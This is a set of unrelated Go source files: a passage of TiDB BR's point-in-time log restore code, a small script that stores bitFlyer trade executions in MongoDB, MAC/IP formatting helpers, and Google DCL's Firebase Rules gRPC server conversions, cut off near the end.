return errors.Trace(err)
}
cfg.Config.Storage = logStorage
} else if len(cfg.FullBackupStorage) > 0 {
skipMsg := []byte(fmt.Sprintf("%s command is skipped due to checkpoint mode for restore\n", FullRestoreCmd))
if _, err := glue.GetConsole(g).Out().Write(skipMsg); err != nil {
return errors.Trace(err)
}
if curTaskInfo != nil && curTaskInfo.TiFlashItems != nil {
log.Info("load tiflash records of snapshot restore from checkpoint")
if err != nil {
return errors.Trace(err)
}
cfg.tiflashRecorder.Load(curTaskInfo.TiFlashItems)
}
}
// restore log.
cfg.adjustRestoreConfigForStreamRestore()
if err := restoreStream(ctx, g, cfg, curTaskInfo, logInfo.logMinTS, logInfo.logMaxTS); err != nil {
return errors.Trace(err)
}
return nil
}
// RunStreamRestore start restore job
func restoreStream(
c context.Context,
g glue.Glue,
cfg *RestoreConfig,
taskInfo *checkpoint.CheckpointTaskInfoForLogRestore,
logMinTS, logMaxTS uint64,
) (err error) {
var (
totalKVCount uint64
totalSize uint64
checkpointTotalKVCount uint64
checkpointTotalSize uint64
mu sync.Mutex
startTime = time.Now()
)
defer func() {
if err != nil {
summary.Log("restore log failed summary", zap.Error(err))
} else {
totalDureTime := time.Since(startTime)
summary.Log("restore log success summary", zap.Duration("total-take", totalDureTime),
zap.Uint64("restore-from", cfg.StartTS), zap.Uint64("restore-to", cfg.RestoreTS),
zap.String("restore-from", stream.FormatDate(oracle.GetTimeFromTS(cfg.StartTS))),
zap.String("restore-to", stream.FormatDate(oracle.GetTimeFromTS(cfg.RestoreTS))),
zap.Uint64("total-kv-count", totalKVCount),
zap.Uint64("skipped-kv-count-by-checkpoint", checkpointTotalKVCount),
zap.String("total-size", units.HumanSize(float64(totalSize))),
zap.String("skipped-size-by-checkpoint", units.HumanSize(float64(checkpointTotalSize))),
zap.String("average-speed", units.HumanSize(float64(totalSize)/totalDureTime.Seconds())+"/s"),
)
}
}()
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan(
"restoreStream",
opentracing.ChildOf(span.Context()),
)
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
cfg.CheckRequirements, true, conn.StreamVersionChecker)
if err != nil {
return errors.Trace(err)
}
defer mgr.Close()
client, err := createRestoreClient(ctx, g, cfg, mgr)
if err != nil {
return errors.Annotate(err, "failed to create restore client")
}
defer client.Close()
var currentTS uint64
if taskInfo != nil && taskInfo.RewriteTS > 0 {
// reuse the task's rewrite ts
log.Info("reuse the task's rewrite ts", zap.Uint64("rewrite-ts", taskInfo.RewriteTS))
currentTS = taskInfo.RewriteTS
} else {
currentTS, err = client.GetTSWithRetry(ctx)
if err != nil {
return errors.Trace(err)
}
}
client.SetCurrentTS(currentTS)
restoreSchedulers, _, err := restorePreWork(ctx, client, mgr, false)
if err != nil {
return errors.Trace(err)
}
// Always run the post-work even on error, so we don't stuck in the import
// mode or emptied schedulers
defer restorePostWork(ctx, client, restoreSchedulers)
// It need disable GC in TiKV when PiTR.
// because the process of PITR is concurrent and kv events isn't sorted by tso.
restoreGc, oldRatio, err := KeepGcDisabled(g, mgr.GetStorage())
if err != nil {
return errors.Trace(err)
}
gcDisabledRestorable := false
defer func() {
// don't restore the gc-ratio-threshold if checkpoint mode is used and restored is not finished
if cfg.UseCheckpoint && !gcDisabledRestorable {
log.Info("skip restore the gc-ratio-threshold for next retry")
return
}
log.Info("start to restore gc", zap.String("ratio", oldRatio))
if err := restoreGc(oldRatio); err != nil {
log.Error("failed to set gc enabled", zap.Error(err))
}
log.Info("finish restoring gc")
}()
var taskName string
var checkpointRunner *checkpoint.CheckpointRunner[checkpoint.LogRestoreKeyType, checkpoint.LogRestoreValueType]
if cfg.UseCheckpoint {
taskName = cfg.generateLogRestoreTaskName(client.GetClusterID(ctx), cfg.StartTS, cfg.RestoreTS)
oldRatioFromCheckpoint, err := client.InitCheckpointMetadataForLogRestore(ctx, taskName, oldRatio)
if err != nil {
return errors.Trace(err)
}
oldRatio = oldRatioFromCheckpoint
checkpointRunner, err = client.StartCheckpointRunnerForLogRestore(ctx, taskName)
if err != nil {
return errors.Trace(err)
}
defer func() {
log.Info("wait for flush checkpoint...")
checkpointRunner.WaitForFinish(ctx, !gcDisabledRestorable)
}()
}
err = client.InstallLogFileManager(ctx, cfg.StartTS, cfg.RestoreTS, cfg.MetadataDownloadBatchSize)
if err != nil {
return err
}
// get full backup meta storage to generate rewrite rules.
fullBackupStorage, err := parseFullBackupTablesStorage(ctx, cfg)
if err != nil {
return errors.Trace(err)
}
// load the id maps only when the checkpoint mode is used and not the first execution
newTask := true
if taskInfo != nil && taskInfo.Progress == checkpoint.InLogRestoreAndIdMapPersist {
newTask = false
}
// get the schemas ID replace information.
schemasReplace, err := client.InitSchemasReplaceForDDL(ctx, &restore.InitSchemaConfig{
IsNewTask: newTask,
HasFullRestore: len(cfg.FullBackupStorage) > 0,
TableFilter: cfg.TableFilter,
TiFlashRecorder: cfg.tiflashRecorder,
FullBackupStorage: fullBackupStorage,
})
if err != nil {
return errors.Trace(err)
}
schemasReplace.AfterTableRewritten = func(deleted bool, tableInfo *model.TableInfo) {
// When the table replica changed to 0, the tiflash replica might be set to `nil`.
// We should remove the table if we meet.
if deleted || tableInfo.TiFlashReplica == nil {
cfg.tiflashRecorder.DelTable(tableInfo.ID)
return
}
cfg.tiflashRecorder.AddTable(tableInfo.ID, *tableInfo.TiFlashReplica)
// Remove the replica firstly. Let's restore them at the end.
tableInfo.TiFlashReplica = nil
}
updateStats := func(kvCount uint64, size uint64) {
mu.Lock()
defer mu.Unlock()
totalKVCount += kvCount
totalSize += size
}
dataFileCount := 0
ddlFiles, err := client.LoadDDLFilesAndCountDMLFiles(ctx, &dataFileCount)
if err != nil {
return err
}
pm := g.StartProgress(ctx, "Restore Meta Files", int64(len(ddlFiles)), !cfg.LogProgress)
if err = withProgress(pm, func(p glue.Progress) error {
client.RunGCRowsLoader(ctx)
return client.RestoreMetaKVFiles(ctx, ddlFiles, schemasReplace, updateStats, p.Inc)
}); err != nil {
return errors.Annotate(err, "failed to restore meta files")
}
rewriteRules := initRewriteRules(schemasReplace)
ingestRecorder := schemasReplace.GetIngestRecorder()
if err := client.RangeFilterFromIngestRecorder(ingestRecorder, rewriteRules); err != nil {
return errors.Trace(err)
}
// generate the upstream->downstream id maps for checkpoint
idrules := make(map[int64]int64)
downstreamIdset := make(map[int64]struct{})
for upstreamId, rule := range rewriteRules {
downstreamId := restore.GetRewriteTableID(upstreamId, rule)
idrules[upstreamId] = downstreamId
downstreamIdset[downstreamId] = struct{}{}
}
logFilesIter, err := client.LoadDMLFiles(ctx)
if err != nil {
return errors.Trace(err)
}
pd := g.StartProgress(ctx, "Restore KV Files", int64(dataFileCount), !cfg.LogProgress)
err = withProgress(pd, func(p glue.Progress) error {
if cfg.UseCheckpoint {
updateStatsWithCheckpoint := func(kvCount, size uint64) {
mu.Lock()
defer mu.Unlock()
totalKVCount += kvCount
totalSize += size
checkpointTotalKVCount += kvCount
checkpointTotalSize += size
}
logFilesIter, err = client.WrapLogFilesIterWithCheckpoint(ctx, logFilesIter, downstreamIdset, taskName, updateStatsWithCheckpoint, p.Inc)
if err != nil {
return errors.Trace(err)
}
}
logFilesIterWithSplit, err := client.WrapLogFilesIterWithSplitHelper(logFilesIter, rewriteRules, g, mgr.GetStorage())
if err != nil {
return errors.Trace(err)
}
return client.RestoreKVFiles(ctx, rewriteRules, idrules, logFilesIterWithSplit, checkpointRunner, cfg.PitrBatchCount, cfg.PitrBatchSize, updateStats, p.IncBy)
})
if err != nil {
return errors.Annotate(err, "failed to restore kv files")
}
if err = client.CleanUpKVFiles(ctx); err != nil {
return errors.Annotate(err, "failed to clean up")
}
if err = client.InsertGCRows(ctx); err != nil {
return errors.Annotate(err, "failed to insert rows into gc_delete_range")
}
if err = client.RepairIngestIndex(ctx, ingestRecorder, g, mgr.GetStorage(), taskName); err != nil {
return errors.Annotate(err, "failed to repair ingest index")
}
if cfg.tiflashRecorder != nil {
sqls := cfg.tiflashRecorder.GenerateAlterTableDDLs(mgr.GetDomain().InfoSchema())
log.Info("Generating SQLs for restoring TiFlash Replica",
zap.Strings("sqls", sqls))
err = g.UseOneShotSession(mgr.GetStorage(), false, func(se glue.Session) error {
for _, sql := range sqls {
if errExec := se.ExecuteInternal(ctx, sql); errExec != nil {
logutil.WarnTerm("Failed to restore tiflash replica config, you may execute the sql restore it manually.",
logutil.ShortError(errExec),
zap.String("sql", sql),
)
}
}
return nil
})
if err != nil {
return err
}
}
failpoint.Inject("do-checksum-with-rewrite-rules", func(_ failpoint.Value) {
if err := client.FailpointDoChecksumForLogRestore(ctx, mgr.GetStorage().GetClient(), mgr.GetPDClient(), idrules, rewriteRules); err != nil {
failpoint.Return(errors.Annotate(err, "failed to do checksum"))
}
})
gcDisabledRestorable = true
return nil
}
func createRestoreClient(ctx context.Context, g glue.Glue, cfg *RestoreConfig, mgr *conn.Mgr) (*restore.Client, error) {
var err error
keepaliveCfg := GetKeepalive(&cfg.Config)
keepaliveCfg.PermitWithoutStream = true
client := restore.NewRestoreClient(mgr.GetPDClient(), mgr.GetTLSConfig(), keepaliveCfg, false)
err = client.Init(g, mgr.GetStorage())
if err != nil {
return nil, errors.Trace(err)
}
defer func() {
if err != nil {
client.Close()
}
}()
u, err := storage.ParseBackend(cfg.Storage, &cfg.BackendOptions)
if err != nil {
return nil, errors.Trace(err)
}
opts := storage.ExternalStorageOptions{
NoCredentials: cfg.NoCreds,
SendCredentials: cfg.SendCreds,
HTTPClient: storage.GetDefaultHttpClient(cfg.MetadataDownloadBatchSize),
}
if err = client.SetStorage(ctx, u, &opts); err != nil {
return nil, errors.Trace(err)
}
client.SetRateLimit(cfg.RateLimit)
client.SetCrypter(&cfg.CipherInfo)
client.SetConcurrency(uint(cfg.Concurrency))
client.SetSwitchModeInterval(cfg.SwitchModeInterval)
client.InitClients(u, false, false)
rawKVClient, err := newRawBatchClient(ctx, cfg.PD, cfg.TLS)
if err != nil {
return nil, errors.Trace(err)
}
client.SetRawKVClient(rawKVClient)
err = client.LoadRestoreStores(ctx)
if err != nil {
return nil, errors.Trace(err)
}
return client, nil
}
func checkLogRange(restoreFrom, restoreTo, logMinTS, logMaxTS uint64) error {
// serveral ts constraint:
// logMinTS <= restoreFrom <= restoreTo <= logMaxTS
if logMinTS > restoreFrom || restoreFrom > restoreTo || restoreTo > logMaxTS {
return errors.Annotatef(berrors.ErrInvalidArgument,
"restore log from %d(%s) to %d(%s), "+
" but the current existed log from %d(%s) to %d(%s)",
restoreFrom, oracle.GetTimeFromTS(restoreFrom),
restoreTo, oracle.GetTimeFromTS(restoreTo),
logMinTS, oracle.GetTimeFromTS(logMinTS),
logMaxTS, oracle.GetTimeFromTS(logMaxTS),
)
}
return nil
}
// withProgress execute some logic with the progress, and close it once the execution done.
func withProgress(p glue.Progress, cc func(p glue.Progress) error) error {
defer p.Close()
return cc(p)
}
// nolint: unused, deadcode
func countIndices(ts map[int64]*metautil.Table) int64 {
result := int64(0)
for _, t := range ts {
result += int64(len(t.Info.Indices))
}
return result
}
type backupLogInfo struct {
logMaxTS uint64
logMinTS uint64
clusterID uint64
}
// getLogRange gets the log-min-ts and log-max-ts of starting log backup.
func getLogRange(
ctx context.Context,
cfg *Config,
) (backupLogInfo, error) {
_, s, err := GetStorage(ctx, cfg.Storage, cfg)
if err != nil {
return backupLogInfo{}, errors.Trace(err)
}
return getLogRangeWithStorage(ctx, cfg, s)
}
func getLogRangeWithStorage(
ctx context.Context,
cfg *Config,
s storage.ExternalStorage,
) (backupLogInfo, error) {
// logStartTS: Get log start ts from backupmeta file.
metaData, err := s.ReadFile(ctx, metautil.MetaFile)
if err != nil {
return backupLogInfo{}, errors.Trace(err)
}
backupMeta := &backuppb.BackupMeta{}
if err = backupMeta.Unmarshal(metaData); err != nil {
return backupLogInfo{}, errors.Trace(err)
}
// endVersion > 0 represents that the storage has been used for `br backup`
if backupMeta.GetEndVersion() > 0 {
return backupLogInfo{}, errors.Annotate(berrors.ErrStorageUnknown,
"the storage has been used for full backup")
}
logStartTS := backupMeta.GetStartVersion()
// truncateTS: get log truncate ts from TruncateSafePointFileName.
// If truncateTS equals 0, which represents the stream log has never been truncated.
truncateTS, err := restore.GetTSFromFile(ctx, s, restore.TruncateSafePointFileName)
if err != nil {
return backupLogInfo{}, errors.Trace(err)
}
logMinTS := mathutil.Max(logStartTS, truncateTS)
// get max global resolved ts from metas.
logMaxTS, err := getGlobalCheckpointFromStorage(ctx, s)
if err != nil {
return backupLogInfo{}, errors.Trace(err)
}
logMaxTS = mathutil.Max(logMinTS, logMaxTS)
return backupLogInfo{
logMaxTS: logMaxTS,
logMinTS: logMinTS,
clusterID: backupMeta.ClusterId,
}, nil
}
func getGlobalCheckpointFromStorage(ctx context.Context, s storage.ExternalStorage) (uint64, error) {
var globalCheckPointTS uint64 = 0
opt := storage.WalkOption{SubDir: stream.GetStreamBackupGlobalCheckpointPrefix()}
err := s.WalkDir(ctx, &opt, func(path string, size int64) error {
if !strings.HasSuffix(path, ".ts") {
return nil
}
buff, err := s.ReadFile(ctx, path)
if err != nil {
return errors.Trace(err)
}
ts := binary.LittleEndian.Uint64(buff)
globalCheckPointTS = mathutil.Max(ts, globalCheckPointTS)
return nil
})
return globalCheckPointTS, errors.Trace(err)
}
// getFullBackupTS gets the snapshot-ts of full bakcup
func getFullBackupTS(
ctx context.Context,
cfg *RestoreConfig,
) (uint64, uint64, error) {
_, s, err := GetStorage(ctx, cfg.FullBackupStorage, &cfg.Config)
if err != nil {
return 0, 0, errors.Trace(err)
}
metaData, err := s.ReadFile(ctx, metautil.MetaFile)
if err != nil {
return 0, 0, errors.Trace(err)
}
backupmeta := &backuppb.BackupMeta{}
if err = backupmeta.Unmarshal(metaData); err != nil {
return 0, 0, errors.Trace(err)
}
return backupmeta.GetEndVersion(), backupmeta.GetClusterId(), nil
}
func parseFullBackupTablesStorage(
ctx context.Context,
cfg *RestoreConfig,
) (*restore.FullBackupStorageConfig, error) {
var storageName string
if len(cfg.FullBackupStorage) > 0 {
storageName = cfg.FullBackupStorage
} else {
storageName = cfg.Storage
}
u, err := storage.ParseBackend(storageName, &cfg.BackendOptions)
if err != nil {
return nil, errors.Trace(err)
}
return &restore.FullBackupStorageConfig{
Backend: u,
Opts: storageOpts(&cfg.Config),
}, nil
}
func initRewriteRules(schemasReplace *stream.SchemasReplace) map[int64]*restore.RewriteRules {
rules := make(map[int64]*restore.RewriteRules)
filter := schemasReplace.TableFilter
for _, dbReplace := range schemasReplace.DbMap {
if utils.IsSysDB(dbReplace.Name) || !filter.MatchSchema(dbReplace.Name) {
continue
}
for oldTableID, tableReplace := range dbReplace.TableMap {
if !filter.MatchTable(dbReplace.Name, tableReplace.Name) {
continue
}
if _, exist := rules[oldTableID]; !exist {
log.Info("add rewrite rule",
zap.String("tableName", dbReplace.Name+"."+tableReplace.Name),
zap.Int64("oldID", oldTableID), zap.Int64("newID", tableReplace.TableID))
rules[oldTableID] = restore.GetRewriteRuleOfTable(
oldTableID, tableReplace.TableID, 0, tableReplace.IndexMap, false)
}
for oldID, newID := range tableReplace.PartitionMap {
if _, exist := rules[oldID]; !exist {
log.Info("add rewrite rule",
zap.String("tableName", dbReplace.Name+"."+tableReplace.Name),
zap.Int64("oldID", oldID), zap.Int64("newID", newID))
rules[oldID] = restore.GetRewriteRuleOfTable(oldID, newID, 0, tableReplace.IndexMap, false)
}
}
}
}
return rules
}
func newRawBatchClient(
ctx context.Context,
pdAddrs []string,
tlsConfig TLSConfig,
) (*restore.RawKVBatchClient, error) {
security := config.Security{
ClusterSSLCA: tlsConfig.CA,
ClusterSSLCert: tlsConfig.Cert,
ClusterSSLKey: tlsConfig.Key,
}
rawkvClient, err := restore.NewRawkvClient(ctx, pdAddrs, security)
if err != nil {
return nil, errors.Trace(err)
}
return restore.NewRawKVBatchClient(rawkvClient, rawKVBatchCount), nil
}
// ShiftTS gets a smaller shiftTS than startTS.
// It has a safe duration between shiftTS and startTS for trasaction.
func ShiftTS(startTS uint64) uint64 {
physical := oracle.ExtractPhysical(startTS)
logical := oracle.ExtractLogical(startTS)
shiftPhysical := physical - streamShiftDuration.Milliseconds()
if shiftPhysical < 0 {
return 0
}
return oracle.ComposeTS(shiftPhysical, logical)
}
func buildPauseSafePointName(taskName string) string {
return fmt.Sprintf("%s_pause_safepoint", taskName)
}
func checkPiTRRequirements(ctx context.Context, g glue.Glue, cfg *RestoreConfig, mgr *conn.Mgr) error {
userDBs := restore.GetExistedUserDBs(mgr.GetDomain())
if len(userDBs) > 0 {
userDBNames := make([]string, 0, len(userDBs))
for _, db := range userDBs {
userDBNames = append(userDBNames, db.Name.O)
}
return errors.Annotatef(berrors.ErrDatabasesAlreadyExisted,
"databases %s existed in restored cluster, please drop them before execute PiTR",
strings.Join(userDBNames, ","))
}
return nil
}
func checkPiTRTaskInfo(
ctx context.Context,
g glue.Glue,
s storage.ExternalStorage,
cfg *RestoreConfig,
) (*checkpoint.CheckpointTaskInfoForLogRestore, bool, error) {
var (
doFullRestore = (len(cfg.FullBackupStorage) > 0)
curTaskInfo *checkpoint.CheckpointTaskInfoForLogRestore
errTaskMsg string
)
mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
cfg.CheckRequirements, true, conn.StreamVersionChecker)
if err != nil {
return nil, false, errors.Trace(err)
}
defer mgr.Close()
clusterID := mgr.GetPDClient().GetClusterID(ctx)
if cfg.UseCheckpoint {
exists, err := checkpoint.ExistsCheckpointTaskInfo(ctx, s, clusterID)
if err != nil {
return nil, false, errors.Trace(err)
}
if exists {
curTaskInfo, err = checkpoint.LoadCheckpointTaskInfoForLogRestore(ctx, s, clusterID)
if err != nil {
return nil, false, errors.Trace(err)
}
// TODO: check whether user has manually modified the cluster(ddl). If so, regard the behavior
// as restore from scratch. (update `curTaskInfo.RewriteTs` to 0 as an uninitial value)
// The task info is written to external storage without status `InSnapshotRestore` only when
// id-maps is persist into external storage, so there is no need to do snapshot restore again.
if curTaskInfo.StartTS == cfg.StartTS && curTaskInfo.RestoreTS == cfg.RestoreTS {
// the same task, check whether skip snapshot restore
doFullRestore = doFullRestore && (curTaskInfo.Progress == checkpoint.InSnapshotRestore)
// update the snapshot restore task name to clean up in final
if !doFullRestore && (len(cfg.FullBackupStorage) > 0) {
_ = cfg.generateSnapshotRestoreTaskName(clusterID)
}
log.Info("the same task", zap.Bool("skip-snapshot-restore", !doFullRestore))
} else {
// not the same task, so overwrite the taskInfo with a new task
log.Info("not the same task, start to restore from scratch")
errTaskMsg = fmt.Sprintf(
"a new task [start-ts=%d] [restored-ts=%d] while the last task info: [start-ts=%d] [restored-ts=%d] [skip-snapshot-restore=%t]",
cfg.StartTS, cfg.RestoreTS, curTaskInfo.StartTS, curTaskInfo.RestoreTS, curTaskInfo.Progress == checkpoint.InLogRestoreAndIdMapPersist)
curTaskInfo = nil
}
}
}
// restore full snapshot precheck.
if doFullRestore {
if !(cfg.UseCheckpoint && curTaskInfo != nil) {
// Only when use checkpoint and not the first execution,
// skip checking requirements.
log.Info("check pitr requirements for the first execution")
if err := checkPiTRRequirements(ctx, g, cfg, mgr); err != nil {
if len(errTaskMsg) > 0 {
err = errors.Annotatef(err, "The current restore task is regarded as %s. "+
"If you ensure that no changes have been made to the cluster since the last execution, "+
"you can adjust the `start-ts` or `restored-ts` to continue with the previous execution. "+
"Otherwise, if you want to restore from scratch, please clean the cluster at first", errTaskMsg)
}
return nil, false, errors.Trace(err)
}
}
}
// persist the new task info
if cfg.UseCheckpoint && curTaskInfo == nil {
log.Info("save checkpoint task info with `InSnapshotRestore` status")
if err := checkpoint.SaveCheckpointTaskInfoForLogRestore(ctx, s, &checkpoint.CheckpointTaskInfoForLogRestore{
Progress: checkpoint.InSnapshotRestore,
StartTS: cfg.StartTS,
RestoreTS: cfg.RestoreTS,
// updated in the stage of `InLogRestoreAndIdMapPersist`
RewriteTS: 0,
TiFlashItems: nil,
}, clusterID); err != nil {
return nil, false, errors.Trace(err)
}
}
return curTaskInfo, doFullRestore, nil
}
|
package main
import (
"time"
log "github.com/sirupsen/logrus"
"gopkg.in/mgo.v2"
"github.com/go-numb/go-bitflyer/auth"
"github.com/go-numb/go-bitflyer/v1"
"github.com/go-numb/go-bitflyer/v1/public/executions"
"github.com/go-numb/go-bitflyer/v1/types"
)
func main() {
done := make(chan struct{})
go getExec()
<-done
}
func getExec() {
bf := v1.NewClient(&v1.ClientOpts{
&auth.AuthConfig{
"", "",
},
})
sec, err := mgo.Dial("http://localhost:28015")
if err != nil {
log.Fatal("mongo database can not set")
}
defer sec.Close()
col := sec.DB("bffx").C("executions")
ticker := time.NewTicker(5 * time.Second)
defer ticker.Stop()
id := 0
rid, ex := getexec(id, bf)
if ex == nil {
log.Fatal("gets executions data is nil")
}
id = rid
for _, e := range ex {
col.Insert(e)
}
for {
select {
case <-ticker.C:
rid, ex := getexec(id, bf)
if ex == nil {
log.Error("gets executions data is nil")
continue
}
id = rid
for _, e := range ex {
col.Insert(e)
}
}
}
}
func getexec(id int, bf *v1.Client) (int, []executions.Execution) {
page := types.Pagination{
Count: 499,
}
if id != 0 {
page.After = id
}
exec, _, err := bf.Executions(&executions.Request{
ProductCode: types.ProductCode("FX_BTC_JPY"),
})
if err != nil {
return id, nil
}
var ex []executions.Execution
ex = []executions.Execution(*exec)
return 0, ex
}
|
package utilities
import (
"fmt"
"strings"
)
// Mac Mac converts a byte array to a mac address
func Mac(data []byte) string {
return strings.Join(ConvertToHex(data), ":")
}
// ConvertToHex Converts a byte array to its Hex representation
func ConvertToHex(data []byte) []string {
var hexBytesArray = make([]string, len(data))
for i,b :=range data {
hexBytesArray[i] = fmt.Sprintf("%X", b)
}
return hexBytesArray
}
// IP Converts a byte array to an IP address separated by decimal numbers and dots
func IP(data []byte) string {
var ipPartAsString = make([]string, len(data))
for i,b := range data {
ipPartAsString[i] = fmt.Sprintf("%d", b)
}
return strings.Join(ipPartAsString, ".")
} |
// Copyright 2023 Google LLC. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package server
import (
"context"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/dcl"
emptypb "github.com/GoogleCloudPlatform/declarative-resource-client-library/python/proto/empty_go_proto"
alphapb "github.com/GoogleCloudPlatform/declarative-resource-client-library/python/proto/firebaserules/alpha/firebaserules_alpha_go_proto"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/services/google/firebaserules/alpha"
)
// RulesetServer implements the gRPC interface for Ruleset.
type RulesetServer struct{}
// ProtoToRulesetSourceLanguageEnum converts a RulesetSourceLanguageEnum enum from its proto representation.
func ProtoToFirebaserulesAlphaRulesetSourceLanguageEnum(e alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum) *alpha.RulesetSourceLanguageEnum {
if e == 0 {
return nil
}
if n, ok := alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum_name[int32(e)]; ok {
e := alpha.RulesetSourceLanguageEnum(n[len("FirebaserulesAlphaRulesetSourceLanguageEnum"):])
return &e
}
return nil
}
// ProtoToRulesetSource converts a RulesetSource object from its proto representation.
func ProtoToFirebaserulesAlphaRulesetSource(p *alphapb.FirebaserulesAlphaRulesetSource) *alpha.RulesetSource {
if p == nil {
return nil
}
obj := &alpha.RulesetSource{
Language: ProtoToFirebaserulesAlphaRulesetSourceLanguageEnum(p.GetLanguage()),
}
for _, r := range p.GetFiles() {
obj.Files = append(obj.Files, *ProtoToFirebaserulesAlphaRulesetSourceFiles(r))
}
return obj
}
// ProtoToRulesetSourceFiles converts a RulesetSourceFiles object from its proto representation.
func ProtoToFirebaserulesAlphaRulesetSourceFiles(p *alphapb.FirebaserulesAlphaRulesetSourceFiles) *alpha.RulesetSourceFiles {
if p == nil {
return nil
}
obj := &alpha.RulesetSourceFiles{
Content: dcl.StringOrNil(p.GetContent()),
Name: dcl.StringOrNil(p.GetName()),
Fingerprint: dcl.StringOrNil(p.GetFingerprint()),
}
return obj
}
// ProtoToRulesetMetadata converts a RulesetMetadata object from its proto representation.
func ProtoToFirebaserulesAlphaRulesetMetadata(p *alphapb.FirebaserulesAlphaRulesetMetadata) *alpha.RulesetMetadata {
if p == nil {
return nil
}
obj := &alpha.RulesetMetadata{}
for _, r := range p.GetServices() {
obj.Services = append(obj.Services, r)
}
return obj
}
// ProtoToRuleset converts a Ruleset resource from its proto representation.
func ProtoToRuleset(p *alphapb.FirebaserulesAlphaRuleset) *alpha.Ruleset {
obj := &alpha.Ruleset{
Name: dcl.StringOrNil(p.GetName()),
Source: ProtoToFirebaserulesAlphaRulesetSource(p.GetSource()),
CreateTime: dcl.StringOrNil(p.GetCreateTime()),
Metadata: ProtoToFirebaserulesAlphaRulesetMetadata(p.GetMetadata()),
Project: dcl.StringOrNil(p.GetProject()),
}
return obj
}
// RulesetSourceLanguageEnumToProto converts a RulesetSourceLanguageEnum enum to its proto representation.
func FirebaserulesAlphaRulesetSourceLanguageEnumToProto(e *alpha.RulesetSourceLanguageEnum) alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum {
if e == nil {
return alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum(0)
}
if v, ok := alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum_value["RulesetSourceLanguageEnum"+string(*e)]; ok {
return alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum(v)
}
return alphapb.FirebaserulesAlphaRulesetSourceLanguageEnum(0)
}
// RulesetSourceToProto converts a RulesetSource object to its proto representation.
func FirebaserulesAlphaRulesetSourceToProto(o *alpha.RulesetSource) *alphapb.FirebaserulesAlphaRulesetSource {
if o == nil {
return nil
}
p := &alphapb.FirebaserulesAlphaRulesetSource{}
p.SetLanguage(FirebaserulesAlphaRulesetSourceLanguageEnumToProto(o.Language))
sFiles := make([]*alphapb.FirebaserulesAlphaRulesetSourceFiles, len(o.Files))
for i, r := range o.Files {
sFiles[i] = FirebaserulesAlphaRulesetSourceFilesToProto(&r)
}
p.SetFiles(sFiles)
return p
}
// RulesetSourceFilesToProto converts a RulesetSourceFiles object to its proto representation.
func FirebaserulesAlphaRulesetSourceFilesToProto(o *alpha.RulesetSourceFiles) *alphapb.FirebaserulesAlphaRulesetSourceFiles {
if o == nil {
return nil
}
p := &alphapb.FirebaserulesAlphaRulesetSourceFiles{}
p.SetContent(dcl.ValueOrEmptyString(o.Content))
p.SetName(dcl.ValueOrEmptyString(o.Name))
p.SetFingerprint(dcl.ValueOrEmptyString(o.Fingerprint))
return p
}
// RulesetMetadataToProto converts a RulesetMetadata object to its proto representation.
func FirebaserulesAlphaRulesetMetadataToProto(o *alpha.RulesetMetadata) *alphapb.FirebaserulesAlphaRulesetMetadata {
if o == nil {
return nil
}
p := &alphapb.FirebaserulesAlphaRulesetMetadata{}
sServices := make([]string, len(o.Services))
for i, r := range o.Services {
sServices[i] = r
}
p.SetServices(sServices)
return p
}
// RulesetToProto converts a Ruleset resource to its proto representation.
func RulesetToProto(resource *alpha.Ruleset) *alphapb.FirebaserulesAlphaRuleset {
p := &alphapb.FirebaserulesAlphaRuleset{}
p.SetName(dcl.ValueOrEmptyString(resource.Name))
p.SetSource(FirebaserulesAlphaRulesetSourceToProto(resource.Source))
p.SetCreateTime(dcl.ValueOrEmptyString(resource.CreateTime))
p.SetMetadata(FirebaserulesAlphaRulesetMetadataToProto(resource.Metadata))
p.SetProject(dcl.ValueOrEmptyString(resource.Project))
return p
}
// applyRuleset handles the gRPC request by passing it to the underlying Ruleset Apply() method.
func (s *RulesetServer) applyRuleset(ctx context.Context, c *alpha.Client, request *alphapb.ApplyFirebaserulesAlphaRulesetRequest) (*alphapb.FirebaserulesAlphaRuleset, error) {
p := ProtoToRuleset(request.GetResource())
res, err := c.ApplyRuleset(ctx, p)
if err != nil {
return nil, err
}
r := RulesetToProto(res)
return r, nil
}
// applyFirebaserulesAlphaRuleset handles the gRPC request by passing it to the underlying Ruleset Apply() method.
func (s *RulesetServer) ApplyFirebaserulesAlphaRuleset(ctx context.Context, request *alphapb.ApplyFirebaserulesAlphaRulesetRequest) (*alphapb.FirebaserulesAlphaRuleset, error) {
cl, err := createConfigRuleset(ctx, request.GetServiceAccountFile())
if err != nil {
return nil, err
}
return s.applyRuleset(ctx, cl, request)
}
// DeleteRuleset handles the gRPC request by passing it to the underlying Ruleset Delete() method.
func (s *RulesetServer) DeleteFirebaserulesAlphaRuleset(ctx context.Context, request *alphapb.DeleteFirebaserulesAlphaRulesetRequest) (*emptypb.Empty, error) {
cl, err := createConfigRuleset(ctx, request.GetServiceAccountFile())
if err != nil {
return nil, err
}
return &emptypb.Empty{}, cl.DeleteRuleset(ctx, ProtoToRuleset(request.GetResource()))
}
// ListFirebaserulesAlphaRuleset handles the gRPC request by passing it to the underlying RulesetList() method.
func (s *RulesetServer) ListFirebaserulesAlphaRuleset(ctx context.Context, request *alphapb.ListFirebaserulesAlphaRulesetRequest) (*alphapb.ListFirebaserulesAlphaRulesetResponse, error) {
cl, err := createConfigRuleset(ctx, request.GetServiceAccountFile())
if err != nil {
return nil, err
}
resources, err := cl.ListRuleset(ctx, request.GetProject())
if err != nil {
